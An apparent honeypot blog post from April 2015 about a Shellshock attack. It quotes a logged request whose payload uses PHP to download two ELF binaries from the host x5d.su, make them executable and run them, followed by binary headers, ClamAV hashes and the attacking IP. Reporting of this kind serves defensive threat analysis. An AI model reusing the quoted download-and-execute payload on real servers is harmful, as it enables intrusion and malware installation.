Samstag, 18. April 2015

susu1 and susu2 ELF files via php injection

Today several code injection attempts had hit my Honeypot.

188.138.40.254 - - [18/Apr/2015:05:37:08 +0200] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0" 404 523 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
The two different files are used to determine which architecture the server has

 susu1:     file format elf64-x86-64
susu1
architecture: i386:x86-64, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x0000000000103cc0

Program Header:
    LOAD off    0x0000000000000000 vaddr 0x0000000000100000 paddr 0x0000000000100000 align 2**20
         filesz 0x0000000000004494 memsz 0x0000000000004494 flags r-x
    LOAD off    0x0000000000009be0 vaddr 0x0000000000509be0 paddr 0x0000000000509be0 align 2**20
         filesz 0x0000000000000000 memsz 0x0000000000000000 flags rw-

Sections:
Idx Name          Size      VMA               LMA               File off  Algn
SYMBOL TABLE:
no symbols
 and

susu2:     file format elf32-i386
susu2
architecture: i386, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x00c03e50

Program Header:
    LOAD off    0x00000000 vaddr 0x00c01000 paddr 0x00c01000 align 2**12
         filesz 0x00003631 memsz 0x00003631 flags r-x
    LOAD off    0x00000d30 vaddr 0x0804fd30 paddr 0x0804fd30 align 2**12
         filesz 0x00000000 memsz 0x00000000 flags rw-

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
SYMBOL TABLE:
no symbols

Clamav hashes (md5 and sha256)
  •  5bc85adb6368be6a5321238377802ffd:18248:susu1
  • 381ea0197f00afe0d8e26bb48b71254b:14492:susu2
  • 5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af:14492:susu2
  • 3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016:18248:susu1
I saw 56 attempts coming from the same source  188.138.40.254 origin country is Germany